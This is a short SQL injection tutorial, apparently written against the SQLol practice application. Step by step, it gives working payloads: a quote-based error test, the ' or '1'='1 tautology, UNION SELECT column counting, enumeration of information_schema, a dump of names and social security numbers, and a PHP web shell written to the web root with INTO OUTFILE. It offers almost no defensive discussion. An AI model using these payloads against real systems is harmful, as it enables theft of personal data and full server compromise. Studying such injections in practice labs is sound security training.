Sql Injection: Starting from Basic

Blocking Apostrophe:
Values to Try
Find User or Parameter to inject

Name Herp Derper
#Try to replace prameter with inverted(') or double quote("), Just see where it throws error.

Detect Filtering

Name Herp 'Derper
# trying the name value as Harp 'Derper insted of Herp Derper
Detect Vulnerability

Once vulnerablity is detected or where system throws error try to equalize the query

Earlier the query was follow:

Select * from user where name='$input';
But we have used an inverted comma in our input so here we get an error because of extra comma, so we need to nutrilize it.

Now our Input becomes
' or '1'='1

Isadmin 2-1

Test for 1 Column Returned

Name Herp Derper
Isadmin 1 UNION SELECT Null #

Test for 2 Columns Returned

Name Herp Derper
Isadmin 1 UNION SELECT Null, Null #

Find Database Names

Name Herp Derper
Isadmin 1 UNION SELECT Null,table_schema FROM information_schema.tables #

Find Tables in sqlol Database

Name Herp Derper
Isadmin 1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' #

Find Columns within ssn Table

Name Herp Derper
Isadmin 1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' #

Dump Names and SSNs

Name Herp Derper
Isadmin 1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn #

Upload a PHP Shell

Name Herp Derper
Isadmin 1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #


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